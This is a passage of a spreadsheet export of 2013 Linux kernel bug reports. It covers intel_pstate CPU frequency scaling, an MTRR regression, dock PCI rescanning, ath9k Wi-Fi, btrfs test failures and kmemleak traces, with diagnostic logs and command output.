    <t>Intel Pstates driver issues, including CPU frequency not stepping up enough</t>
  </si>
  <si>
    <t>3.10.0-rc4+</t>
  </si>
  <si>
    <t>2013-06-08 23:37 UTC</t>
  </si>
  <si>
    <t>Doug Smythies</t>
  </si>
  <si>
    <t>2014-10-28 05:34 UTC</t>
  </si>
  <si>
    <t>Created attachment 103961 [details] 1 of 4 - CPU always under 100% load between samples Kernel (from: git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git) doug@s15:~/temp$ uname -a Linux s15 3.10.0-rc4+ #1 SMP Sat Jun 8 08:48:15 PDT 2013 x86_64 x86_64 x86_64 GNU/Linux However, much of my testing work was done on a distro specific version of 3.10rc4, and then I confirmed the same results on the above kernel. Processor: vendor_id : GenuineIntel cpu family : 6 model : 42 model name : Intel(R) Core(TM) i7-2600K CPU @ 3.40GHz stepping : 7 microcode : 0x26 maximum frequency, turbo on = 3.8 GHz = 100% maximum frequency, turbo off = 2.4 GHz = 100% (when turbo disabled, apparently) minimum frequency = 1.6 GHz = 42% of max, turbo on or 47% of max, turbo off (see comments about min freq later) Note 1: Thermal throttling is not the issue in any of these tests. Note 2: I realize that can use intel_pstate=disable to be able to do some things mentioned herein, but I am just trying to help with this driver. Note 3: I have read everything I could find about this new driver, but that doesn't mean I didn't miss something important. Issue 1 (the main issue): pstate driver conditions: "powersave" /sys/devices/system/cpu/intel_pstate/max_perf_pct = 100 /sys/devices/system/cpu/intel_pstate/min_perf_pct = 42 /sys/devices/system/cpu/intel_pstate/no_turbo = 0 or 1, it does not matter Note: problem does not occur under these conditions: "performance" /sys/devices/system/cpu/intel_pstate/max_perf_pct = 100 /sys/devices/system/cpu/intel_pstate/min_perf_pct = 100 /sys/devices/system/cpu/intel_pstate/no_turbo = 0 (1 not tested) Sometimes (approximately 20% of the time, sample size 1000 tests for each pstate driver conditions listed above), when a CPU intensive single thread task is started, the CPU only ramps up to 1.768 GHz instead of the maximum frequency. When this occurs, more load can be added and added until all CPUs are fully loaded and the CPU frequency will never increase. Example (issue occurring): doug@s15:~/temp$ sudo cat /sys/devices/system/cpu/cpu*/cpufreq/cpuinfo_cur_freq 1768000 1768000 1768000 1768000 1768000 1768000 1768000 1768000 top - 09:56:37 up 51 min, 3 users, load average: 8.00, 7.99, 6.84 Tasks: 154 total, 9 running, 145 sleeping, 0 stopped, 0 zombie Cpu0 :100.0%us, 0.0%sy, 0.0%ni, 0.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Cpu1 : 99.7%us, 0.3%sy, 0.0%ni, 0.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Cpu2 :100.0%us, 0.0%sy, 0.0%ni, 0.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Cpu3 :100.0%us, 0.0%sy, 0.0%ni, 0.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Cpu4 :100.0%us, 0.0%sy, 0.0%ni, 0.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Cpu5 :100.0%us, 0.0%sy, 0.0%ni, 0.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Cpu6 :100.0%us, 0.0%sy, 0.0%ni, 0.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Cpu7 :100.0%us, 0.0%sy, 0.0%ni, 0.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Example (issue not occurring, single CPU (7) loaded): doug@s15:~/temp$ sudo cat /sys/devices/system/cpu/cpu*/cpufreq/cpuinfo_cur_freq 3672000 3672000 3638000 3774000 3672000 3502000 3604000 3774000 &lt;&lt;&lt;&lt; The active fully loaded CPU top - 10:00:22 up 55 min, 3 users, load average: 2.75, 6.29, 6.49 Tasks: 147 total, 2 running, 145 sleeping, 0 stopped, 0 zombie Cpu0 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Cpu1 : 0.0%us, 0.0%sy, 0.0%ni, 99.7%id, 0.3%wa, 0.0%hi, 0.0%si, 0.0%st Cpu2 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Cpu3 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Cpu4 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Cpu5 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Cpu6 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Cpu7 :100.0%us, 0.0%sy, 0.0%ni, 0.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Issue 2: When turbo is turned off, it seems that max_perf_pct = 100 now means 3.4 GHz (see test result graphs). So, shouldn't min_perf_pct now become 47 percent (for my case)? Or, min should always be 47 and max should be 100 for turbo off and 112 for turbo on? Issue 3: Sometimes it is desirable to lock the CPU frequencies at some value, at least when it is active. Now, these settings work fine: "performance" /sys/devices/system/cpu/intel_pstate/max_perf_pct = 42 /sys/devices/system/cpu/intel_pstate/min_perf_pct = 42 /sys/devices/system/cpu/intel_pstate/no_turbo = 0 (or 1 with both of the above set to 47, but leaving them at 42 works also) But some other settings give odd results, and also seem to depend on if the numbers are increasing or decreasing and if the CPU was unload or loaded before the change. This is best described by graphs of the experiments done. Attached. Potentially of particular interest are the cases were the CPU frequency is always 1.768 GHz when sampled (5 seconds after the CPU becomes 100% loaded). For example: "performance" /sys/devices/system/cpu/intel_pstate/max_perf_pct = 69 /sys/devices/system/cpu/intel_pstate/min_perf_pct = 69 /sys/devices/system/cpu/intel_pstate/no_turbo = 0 Where we would expect something around 2.6 GHz. I also tested loading other CPUs at the same time, and could never get any other frequency (tested about 100 times, in addition to the 24 done to make the graphs)(Correction: a few times the CPU kicked up in frequency, but just after the sample was taken, and I think because of the action of either waking up to take the sample or whatever). Sub-experiment: Take another frequency sample after another couple of seconds, to get an accurate count of how many times out of 100 it kicks up after the first sample: Results: 3 times out of 100. Sub-sub-experiment: Does the CPU kick up because the controlling script came out of sleep, or is it because it reads /sys/devices/system/cpu/cpu7/cpufreq/cpuinfo_cur_freq? Result: Inconclusive (Will try to think of a better test and test more later, if required. Might require a larger sample size). To be clear, it is not best effieciency wanted here, it is knowing that the active CPU frequency will always be the same. An example application is the test procedure to make sure that reported load averages are correct. Issue 4: It appears as though there is a slight rounding down effect in the reported frequencies. Wouldn't we at least expect turbostat to give the same numbers? Example: doug@s15:~/temp$ sudo cat /sys/devices/system/cpu/cpu*/cpufreq/cpuinfo_cur_freq 3468000 3468000 3468000 3468000 3468000 3468000 3468000 3468000 doug@s15:~/temp$ sudo ./turbostat cr CPU %c0 GHz TSC %c1 %c3 %c6 %c7 %pc2 %pc3 %pc6 %pc7 100.00 3.51 3.41 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0 0 100.00 3.51 3.41 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0 4 100.00 3.51 3.41 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 1 1 100.00 3.51 3.41 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 1 5 100.00 3.51 3.41 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 2 2 100.00 3.51 3.41 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 2 6 100.00 3.51 3.41 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 3 3 100.00 3.51 3.41 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 3 7 100.00 3.51 3.41 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 Issue 5: (actually just an opinion, and at the risk of raising an issue that seems to have been brought up a lot) Why wasn't what is now called "powersave" called "ondemand" (or "conservative" if preferred), as it is similar? Then "powersave" could have been as it was, namely: "powersave" /sys/devices/system/cpu/intel_pstate/max_perf_pct = 42 /sys/devices/system/cpu/intel_pstate/min_perf_pct = 42 /sys/devices/system/cpu/intel_pstate/no_turbo = 0 (or 1 with both of the above set to 47)</t>
  </si>
  <si>
    <t>Regression/Broken MTRR with commit cd7b304dfaf1f3999ac5d2a1feeba95dec4284a9 "x86, range: fix missing merge during add range"</t>
  </si>
  <si>
    <t>3.9.5</t>
  </si>
  <si>
    <t>2013-06-09 09:23 UTC</t>
  </si>
  <si>
    <t>2013-07-16 10:01 UTC</t>
  </si>
  <si>
    <t>Created attachment 104011 [details] dmesg - broken mttr with 3.9.5 Commit cd7b304dfaf1f3999ac5d2a1feeba95dec4284a9 "x86, range: fix missing merge during add range" introduced a regression for me. After upgrading to kernel-3.9.5 my dmesg is full of '*BAD*gran_size:' entries (see attached files). 3.9.4 works fine. /proc/mtrr now looks like this (with 3.9.5): # cat /proc/mtrr reg00: base=0x000000000 ( 0MB), size=16384MB, count=1: write-back reg01: base=0x400000000 (16384MB), size= 1024MB, count=1: write-back reg02: base=0x0c0000000 ( 3072MB), size= 1024MB, count=1: uncachable reg03: base=0x43f800000 (17400MB), size= 8MB, count=1: uncachable Reverting the offending commit gives me back # cat /proc/mtrr reg00: base=0x000000000 ( 0MB), size= 2048MB, count=1: write-back reg01: base=0x080000000 ( 2048MB), size= 1024MB, count=1: write-back reg02: base=0x100000000 ( 4096MB), size= 4096MB, count=1: write-back reg03: base=0x200000000 ( 8192MB), size= 8192MB, count=1: write-back reg04: base=0x400000000 (16384MB), size= 1024MB, count=1: write-back reg05: base=0x43f800000 (17400MB), size= 8MB, count=1: uncachable reg06: base=0x0c0000000 ( 3072MB), size= 256MB, count=1: write-combining The upstream commit is: fbe06b7bae7c9cf6ab05168fce5ee93b2f4bae7c</t>
  </si>
  <si>
    <t>Sony VAIO VPCZ23A4R: PCI bus is not rescanned on docking/undocking (worked in 3.9)</t>
  </si>
  <si>
    <t>3.10-rc4</t>
  </si>
  <si>
    <t>2013-06-10 06:30 UTC</t>
  </si>
  <si>
    <t>2013-06-27 20:21 UTC</t>
  </si>
  <si>
    <t>The following commit (identified by git bisect) introduced a regression on my Sony VAIO VPCZ23A4R laptop: commit 3b63aaa70e1ccc4b66d60acc78da09700706a703 Author: Jiang Liu &lt;liuj97@gmail.com&gt; Date: Fri Apr 12 05:44:26 2013 +0000 PCI: acpiphp: Do not use ACPI PCI subdriver mechanism The regression manifests itself as follows: boot the laptop without the dock station, then connect it, and the laptop does not see the PCI devices in the dock station. Before that commit, it did, but only the CD-ROM connected to the Marvell pata controller actually worked (see bug 56531). A simple echo 1 &gt; /sys/bus/pci/rescan is sufficient for the laptop to see the devices on the bus. Interestingly, after this commit with manual PCI bus rescan the CD-ROM started working (before that pata_marvell would only complain about "no native port available"). I will attach dmesgs both from the working and non-working kernels. Acpidump output is available from bug 55611.</t>
  </si>
  <si>
    <t>Bad connectivity with ath9k AR9485 when power management off</t>
  </si>
  <si>
    <t>3.10-rc5</t>
  </si>
  <si>
    <t>2013-06-14 05:18 UTC</t>
  </si>
  <si>
    <t>jkp</t>
  </si>
  <si>
    <t>2013-10-15 16:04 UTC</t>
  </si>
  <si>
    <t>Moved from https://bugzilla.kernel.org/show_bug.cgi?id=49201https://bugzilla.kernel.org/show_bug.cgi?id=49201 where it came up: All works fine with power management off with fixes from bug 49201, but with power management off, when I look at the iwconfig bit rate every five seconds, it's mostly 65 Mbps but about every once in 25 .. once in 50 it's 1 Mbps. Also, occasionally there are longer periods of low speed (1..30 Mbps) and this affects also practical usability quite a lot. Hardware: asus transformer book tx300 (4005)</t>
  </si>
  <si>
    <t>intel_pstate synchronizes frequencies on wake from suspend</t>
  </si>
  <si>
    <t>3.10.0rc5, 3.10.0rc6</t>
  </si>
  <si>
    <t>2013-06-16 16:12 UTC</t>
  </si>
  <si>
    <t>pqwoerituytrueiwoq</t>
  </si>
  <si>
    <t>2013-09-24 01:47 UTC</t>
  </si>
  <si>
    <t>Created attachment 104841 [details] Behavior before suspend When 1st boot both my core's frequencies change independently, but once i wake from suspend they are synchronized ~$ uname -r # http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.10-rc6-saucy/ 3.10.0-031000rc6-generic $ cat /sys/devices/system/cpu/cpu*/cpufreq/scaling_driver intel_pstate intel_pstate $ cat /sys/devices/system/cpu/cpu*/cpuidle/driver/name intel_idle intel_idle $ cat /proc/cpuinfo # Only showing one core processor : 1 vendor_id : GenuineIntel cpu family : 6 model : 42 model name : Intel(R) Pentium(R) CPU B970 @ 2.30GHz stepping : 7 microcode : 0x23 cpu MHz : 1242.000 cache size : 2048 KB physical id : 0 siblings : 2 core id : 1 cpu cores : 2 apicid : 2 initial apicid : 2 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf eagerfpu pni pclmulqdq dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer xsave lahf_lm arat epb xsaveopt pln pts dtherm bogomips : 4589.55 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical, 48 bits virtual power management:</t>
  </si>
  <si>
    <t>xfstets/generic/083 fails to mount with enospc</t>
  </si>
  <si>
    <t>3.10-rc5+</t>
  </si>
  <si>
    <t>2013-06-17 12:49 UTC</t>
  </si>
  <si>
    <t>2013-07-09 14:25 UTC</t>
  </si>
  <si>
    <t>syslog: [ 4798.625241] BTRFS critical (device sda9): could not do orphan cleanup -28 [ 4799.013092] btrfs: open_ctree failed generic/083 51s ... [14:19:23] [14:20:16] [failed, exit status 1] - output mismatch (see /root/xfstests/results/generic/083.out.bad) --- tests/generic/083.out 2013-05-29 17:16:02.000000000 +0200 +++ /root/xfstests/results/generic/083.out.bad 2013-06-17 14:20:16.000000000 +0200 @@ -1,4 +1,5 @@ QA output created by 083 *** test out-of-space handling for random write operations -*** done +mount: No space left on device +!!! failed to remount /dev/sda9 on /mnt/a2 *** unmount mount options: rw,noatime,space_cache,enospc_debug mkfs options: default (d/single, m/dup) btrfs-next/master rebased on current linus (77293e215edef7871a39de4b3) commit 7057a3d47fff916883ceb3997231df48d74cea93 Author: Wang Sheng-Hui &lt;shhuiw@gmail.com&gt; Date: Fri Jun 14 16:21:24 2013 +0800 Btrfs: fix the comment typo for btrfs_attach_transaction_barrier</t>
  </si>
  <si>
    <t>ata_bay access while undocked regression</t>
  </si>
  <si>
    <t>v3.10-rc6</t>
  </si>
  <si>
    <t>2013-06-18 08:12 UTC</t>
  </si>
  <si>
    <t>Dirk Griesbach</t>
  </si>
  <si>
    <t>2013-06-27 02:02 UTC</t>
  </si>
  <si>
    <t>The FSC S7110 notebook contains an ata_bay/battery_bay. If the bay-CD-drive is accessed while the bay is undocked, an error like: | $ eject | eject: unable to eject, last error: Inappropriate ioctl for device will be prompted. The first time the undocked device is tried to be accessed, the operation is stalled for some seconds and the following lines are written to dmesg: [ 161.293085] ata5.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x6 frozen [ 161.297109] ata5.00: ST_FIRST: !(DRQ|ERR|DF) [ 161.301111] sr 4:0:0:0: CDB: [ 161.301117] Get event status notification: 4a 01 00 00 10 00 00 00 08 00 [ 161.301147] ata5.00: cmd a0/00:00:00:08:00/00:00:00:00:00/a0 tag 0 pio 16392 in [ 161.301147] res 00/00:00:00:00:00/00:00:00:00:00/00 Emask 0x2 (HSM violation) [ 161.309410] ata5: soft resetting link [ 161.464312] ata5.00: NODEV after polling detection [ 161.464318] ata5.00: revalidation failed (errno=-2) [ 166.464119] ata5: soft resetting link [ 166.620311] ata5.00: NODEV after polling detection [ 166.620317] ata5.00: revalidation failed (errno=-2) [ 171.620119] ata5: soft resetting link [ 171.776295] ata5.00: NODEV after polling detection [ 171.776301] ata5.00: revalidation failed (errno=-2) [ 171.780381] ata5.00: disabled [ 171.780430] ata5: soft resetting link [ 171.936181] ata5: EH complete Any further access to the device is instant and does not produce any more dmesg output but only the "Inappropriate ioctl for device" message. Even if the device is docked again, it can't be accessed but only the same error message appears without any additional dmesg output. A bisect indicates commit [30dcf76acc695cbd2fa919e294670fe9552e16e7] "libata: migrate ACPI code over to new bindings" to be the culprit. Before this, accessing the undocked device resulted in an "device not found" message and if the device was docked again, it would work as exppected.</t>
  </si>
  <si>
    <t>fio workload randrw verify failure</t>
  </si>
  <si>
    <t>3.9.6</t>
  </si>
  <si>
    <t>2013-06-19 12:40 UTC</t>
  </si>
  <si>
    <t>2013-07-09 14:26 UTC</t>
  </si>
  <si>
    <t>This might turn out to be a false alert, don't panic. Problem description: fio job reports verification failure for a random read-write jobs. Number of failure reports is 10. See attached output from fio run. * Setup * kernel is built from Kernel:stable repository of opensuse and contains only unrelated extra patches. (http://kernel.suse.com/cgit/kernel-source/tree/series.conf?h=stable). machine: 8 cpu (quadcore, HT), i7-2820QM, 2GB randrw-verify.fio: [global] rw=randrw randrepeat=1 size=1000m filesize=100k-10m nrfiles=100 bsrange=512b-64k bs_unaligned scramble_buffers=1 ioengine=libaio fsync=1024 verify=md5 do_verify=1 verify_fatal=1 verify_dump=1 [job0] [job1] [job2] [job3] [job4] [job5] [job6] [job7] [job8] [job9] ------------------ mkfs.btrfs -d single -m single /dev/sda[56789] (each has 12G) mount with autodefrag I haven't tried to reproduce it on other machines or other kernels yet.</t>
  </si>
  <si>
    <t>Device using ath9k no longer able to connect to WPA2 networks.</t>
  </si>
  <si>
    <t>2013-06-20 18:41 UTC</t>
  </si>
  <si>
    <t>Tony Finn</t>
  </si>
  <si>
    <t>2013-10-15 16:32 UTC</t>
  </si>
  <si>
    <t>always return NF_DROP</t>
  </si>
  <si>
    <t>2013-06-22 09:31 UTC</t>
  </si>
  <si>
    <t>Balazs Peter Odor</t>
  </si>
  <si>
    <t>2013-11-13 19:46 UTC</t>
  </si>
  <si>
    <t>-next and -mm: kmemleak reports 6 leaks in ext4_mount paths</t>
  </si>
  <si>
    <t>v3.10-rc6-684-g9dcc58c</t>
  </si>
  <si>
    <t>2013-06-25 18:25 UTC</t>
  </si>
  <si>
    <t>Created attachment 106021 [details] .config In next-20130624, next-20130625 and mmotm (v3.10-rc6-684-g9dcc58c), kmemleak complains about some ext4_mount related allocations. ---- # cat /sys/kernel/debug/kmemleak unreferenced object 0xffff880002a6dd80 (size 256): comm "swapper/0", pid 1, jiffies 4294892475 (age 33.128s) hex dump (first 32 bytes): 00 00 00 00 ad 4e ad de ff ff ff ff 00 00 00 00 .....N.......... ff ff ff ff ff ff ff ff 0c 0d 36 82 ff ff ff ff ..........6..... backtrace: [&lt;ffffffff813adfc1&gt;] kmemleak_alloc+0x21/0x50 [&lt;ffffffff810e7b43&gt;] __kmalloc+0x103/0x460 [&lt;ffffffff810cdd81&gt;] list_lru_init+0x21/0xb0 [&lt;ffffffff810f36b5&gt;] sget+0x305/0x670 [&lt;ffffffff810f463a&gt;] mount_bdev+0xba/0x1e0 [&lt;ffffffff81175460&gt;] ext4_mount+0x10/0x20 [&lt;ffffffff810f4950&gt;] mount_fs+0x10/0xc0 [&lt;ffffffff81111c5a&gt;] vfs_kern_mount+0x5a/0xf0 [&lt;ffffffff811133ca&gt;] do_mount+0x1da/0x9d0 [&lt;ffffffff81113c3e&gt;] SyS_mount+0x7e/0xc0 [&lt;ffffffff8184c245&gt;] mount_block_root+0x104/0x223 [&lt;ffffffff8184c455&gt;] mount_root+0xf1/0xfa [&lt;ffffffff8184c58e&gt;] prepare_namespace+0x130/0x168 [&lt;ffffffff8184bff8&gt;] kernel_init_freeable+0x185/0x192 [&lt;ffffffff813ab7f9&gt;] kernel_init+0x9/0x180 [&lt;ffffffff813c963c&gt;] ret_from_fork+0x7c/0xb0 unreferenced object 0xffff880002a6d980 (size 256): comm "swapper/0", pid 1, jiffies 4294892475 (age 33.128s) hex dump (first 32 bytes): 00 00 00 00 ad 4e ad de ff ff ff ff 00 00 00 00 .....N.......... ff ff ff ff ff ff ff ff 0c 0d 36 82 ff ff ff ff ..........6..... backtrace: [&lt;ffffffff813adfc1&gt;] kmemleak_alloc+0x21/0x50 [&lt;ffffffff810e7b43&gt;] __kmalloc+0x103/0x460 [&lt;ffffffff810cdd81&gt;] list_lru_init+0x21/0xb0 [&lt;ffffffff810f36c9&gt;] sget+0x319/0x670 [&lt;ffffffff810f463a&gt;] mount_bdev+0xba/0x1e0 [&lt;ffffffff81175460&gt;] ext4_mount+0x10/0x20 [&lt;ffffffff810f4950&gt;] mount_fs+0x10/0xc0 [&lt;ffffffff81111c5a&gt;] vfs_kern_mount+0x5a/0xf0 [&lt;ffffffff811133ca&gt;] do_mount+0x1da/0x9d0 [&lt;ffffffff81113c3e&gt;] SyS_mount+0x7e/0xc0 [&lt;ffffffff8184c245&gt;] mount_block_root+0x104/0x223 [&lt;ffffffff8184c455&gt;] mount_root+0xf1/0xfa [&lt;ffffffff8184c58e&gt;] prepare_namespace+0x130/0x168 [&lt;ffffffff8184bff8&gt;] kernel_init_freeable+0x185/0x192 [&lt;ffffffff813ab7f9&gt;] kernel_init+0x9/0x180 [&lt;ffffffff813c963c&gt;] ret_from_fork+0x7c/0xb0 unreferenced object 0xffff880002a7a7a0 (size 32): comm "swapper/0", pid 1, jiffies 4294892475 (age 33.128s) hex dump (first 32 bytes): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ backtrace: [&lt;ffffffff813adfc1&gt;] kmemleak_alloc+0x21/0x50 [&lt;ffffffff810e7b43&gt;] __kmalloc+0x103/0x460 [&lt;ffffffff810c091e&gt;] register_shrinker+0x7e/0xa0 [&lt;ffffffff810f394e&gt;] sget+0x59e/0x670 [&lt;ffffffff810f463a&gt;] mount_bdev+0xba/0x1e0 [&lt;ffffffff81175460&gt;] ext4_mount+0x10/0x20 [&lt;ffffffff810f4950&gt;] mount_fs+0x10/0xc0 [&lt;ffffffff81111c5a&gt;] vfs_kern_mount+0x5a/0xf0 [&lt;ffffffff811133ca&gt;] do_mount+0x1da/0x9d0 [&lt;ffffffff81113c3e&gt;] SyS_mount+0x7e/0xc0 [&lt;ffffffff8184c245&gt;] mount_block_root+0x104/0x223 [&lt;ffffffff8184c455&gt;] mount_root+0xf1/0xfa [&lt;ffffffff8184c58e&gt;] prepare_namespace+0x130/0x168 [&lt;ffffffff8184bff8&gt;] kernel_init_freeable+0x185/0x192 [&lt;ffffffff813ab7f9&gt;] kernel_init+0x9/0x180 [&lt;ffffffff813c963c&gt;] ret_from_fork+0x7c/0xb0 unreferenced object 0xffff88000692b1c0 (size 256): comm "swapper/0", pid 1, jiffies 4294892648 (age 32.500s) hex dump (first 32 bytes): 00 00 00 00 ad 4e ad de ff ff ff ff 00 00 00 00 .....N.......... ff ff ff ff ff ff ff ff 0c 0d 36 82 ff ff ff ff ..........6..... backtrace: [&lt;ffffffff813adfc1&gt;] kmemleak_alloc+0x21/0x50 [&lt;ffffffff810e7b43&gt;] __kmalloc+0x103/0x460 [&lt;ffffffff810cdd81&gt;] list_lru_init+0x21/0xb0 [&lt;ffffffff810f36b5&gt;] sget+0x305/0x670 [&lt;ffffffff810f463a&gt;] mount_bdev+0xba/0x1e0 [&lt;ffffffff81175460&gt;] ext4_mount+0x10/0x20 [&lt;ffffffff810f4950&gt;] mount_fs+0x10/0xc0 [&lt;ffffffff81111c5a&gt;] vfs_kern_mount+0x5a/0xf0 [&lt;ffffffff811133ca&gt;] do_mount+0x1da/0x9d0 [&lt;ffffffff81113c3e&gt;] SyS_mount+0x7e/0xc0 [&lt;ffffffff8184c245&gt;] mount_block_root+0x104/0x223 [&lt;ffffffff8184c455&gt;] mount_root+0xf1/0xfa [&lt;ffffffff8184c58e&gt;] prepare_namespace+0x130/0x168 [&lt;ffffffff8184bff8&gt;] kernel_init_freeable+0x185/0x192 [&lt;ffffffff813ab7f9&gt;] kernel_init+0x9/0x180 [&lt;ffffffff813c963c&gt;] ret_from_fork+0x7c/0xb0 unreferenced object 0xffff88000692b2c0 (size 256): comm "swapper/0", pid 1, jiffies 4294892648 (age 32.500s) hex dump (first 32 bytes): 00 00 00 00 ad 4e ad de ff ff ff ff 00 00 00 00 .....N.......... ff ff ff ff ff ff ff ff 0c 0d 36 82 ff ff ff ff ..........6..... backtrace: [&lt;ffffffff813adfc1&gt;] kmemleak_alloc+0x21/0x50 [&lt;ffffffff810e7b43&gt;] __kmalloc+0x103/0x460 [&lt;ffffffff810cdd81&gt;] list_lru_init+0x21/0xb0 [&lt;ffffffff810f36c9&gt;] sget+0x319/0x670 [&lt;ffffffff810f463a&gt;] mount_bdev+0xba/0x1e0 [&lt;ffffffff81175460&gt;] ext4_mount+0x10/0x20 [&lt;ffffffff810f4950&gt;] mount_fs+0x10/0xc0 [&lt;ffffffff81111c5a&gt;] vfs_kern_mount+0x5a/0xf0 [&lt;ffffffff811133ca&gt;] do_mount+0x1da/0x9d0 [&lt;ffffffff81113c3e&gt;] SyS_mount+0x7e/0xc0 [&lt;ffffffff8184c245&gt;] mount_block_root+0x104/0x223 [&lt;ffffffff8184c455&gt;] mount_root+0xf1/0xfa [&lt;ffffffff8184c58e&gt;] prepare_namespace+0x130/0x168 [&lt;ffffffff8184bff8&gt;] kernel_init_freeable+0x185/0x192 [&lt;ffffffff813ab7f9&gt;] kernel_init+0x9/0x180 [&lt;ffffffff813c963c&gt;] ret_from_fork+0x7c/0xb0 unreferenced object 0xffff880006916780 (size 32): comm "swapper/0", pid 1, jiffies 4294892648 (age 32.500s) hex dump (first 32 bytes): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ backtrace: [&lt;ffffffff813adfc1&gt;] kmemleak_alloc+0x21/0x50 [&lt;ffffffff810e7b43&gt;] __kmalloc+0x103/0x460 [&lt;ffffffff810c091e&gt;] register_shrinker+0x7e/0xa0 [&lt;ffffffff810f394e&gt;] sget+0x59e/0x670 [&lt;ffffffff810f463a&gt;] mount_bdev+0xba/0x1e0 [&lt;ffffffff81175460&gt;] ext4_mount+0x10/0x20 [&lt;ffffffff810f4950&gt;] mount_fs+0x10/0xc0 [&lt;ffffffff81111c5a&gt;] vfs_kern_mount+0x5a/0xf0 [&lt;ffffffff811133ca&gt;] do_mount+0x1da/0x9d0 [&lt;ffffffff81113c3e&gt;] SyS_mount+0x7e/0xc0 [&lt;ffffffff8184c245&gt;] mount_block_root+0x104/0x223 [&lt;ffffffff8184c455&gt;] mount_root+0xf1/0xfa [&lt;ffffffff8184c58e&gt;] prepare_namespace+0x130/0x168 [&lt;ffffffff8184bff8&gt;] kernel_init_freeable+0x185/0x192 [&lt;ffffffff813ab7f9&gt;] kernel_init+0x9/0x180 [&lt;ffffffff813c963c&gt;] ret_from_fork+0x7c/0xb0 #</t>
  </si>
  <si>
    <t>Fujitsu E753: Backlight dark onbootup</t>
  </si>
  <si>
    <t>3.9.7</t>
  </si>
  <si>
    <t>2013-06-26 09:15 UTC</t>
  </si>
  <si>
    <t>Jan Hinnerk Stosch</t>
  </si>
  <si>
    <t>2013-11-25 07:57 UTC</t>
  </si>
  <si>
    <t>On my Fujitsu Lifebook E753 I experienced some "regressions" with current kernel versions (e.g. 3.9.7) compared to linux 3.5 (used in Ubuntu 12.04 for instance): - on bootup backlight is extremely dark (I can change it though) - the wireless button does not work any more Recently I did a bisect and found out, that the "regression" was introduced with commit "a57f7f9175b8ccbc9df83ac13860488913115de4". Searching the internet I read about a bootloader option "acpi_osi="!Windows 2012" which solved the issue for me. I reported it on the linux-acpi mailing list and was asked to report it here and add a acpidump. Perhaps I have done something wrong but all I get is: Linux version not implemented yet Could not get ACPI tables, AE_SUPPORT If you need some additional information tell me. Thanks.</t>
  </si>
  <si>
    <t>firewire camera - DMA ring buffer being read/played twice in YUV422 mode</t>
  </si>
  <si>
    <t>3.9.7, 3.9.6</t>
  </si>
  <si>
    <t>2013-06-26 19:01 UTC</t>
  </si>
  <si>
    <t>Stepan Salenikovich</t>
  </si>
  <si>
    <t>2013-07-30 14:08 UTC</t>
  </si>
  <si>
    <t>Overview: Using a firewire camera (Imagingsource DFK 41BF02.h) and Coriander (or other software using the 'libdc1394' library) to get images (video) from the camera. This camera has two pixel modes - MONO8 and YUV422. The issue is that in the YUV422 colour mode the DMA ring buffer seems to get read twice. That is, the video is played twice. The period of repetition depends on the size of the 'DMA ring buffer' which can be set in Coriander. The problem does not occur in the MONO8 colour mode. I am using Arch Linux and encountered the issue under kernel 3.9.7 and 3.9.6. Arch Linux also has a 'linux-lts' package with kernel 3.0.83. The issue goes away if I use kernel 3.0.83. Hardware: F/W: VIA FireWire (IEEE 1394) driven by firewire_ohci CPU: Intel Core i3-2105 M/B: Intel DH77DF Camera: Imagingsource DFK 41BF02.h Steps to Reproduce: 0) Install libraw1394 and Coriander and make sure you have 'video' group permissions. 1) Plug in firewire (non DV) camera. 2) Launch Coriander and go to 'Services' tab 3) Set the format to YUV422 4) Click the 'Display' button so that the camera view window appears. Actual Result: Delayed video from camera with playback at a faster speed and the video repeating once every X number of frames, where X seems to be the DMA ring buffer size which can be set in Coriander Expected Result: Near real time video display from the camera, same as in the Mono 8bpp mode, but in colour. Additional notes: Before trying an older kernel, I also tried downgrading the various libraries and packages involved (libdc1394, libraw1394, Coriander, camwire) and that did not solve the issue under kernel 3.9.7/6.</t>
  </si>
  <si>
    <t>intel_pstate driver missing ids for some supported CPUs</t>
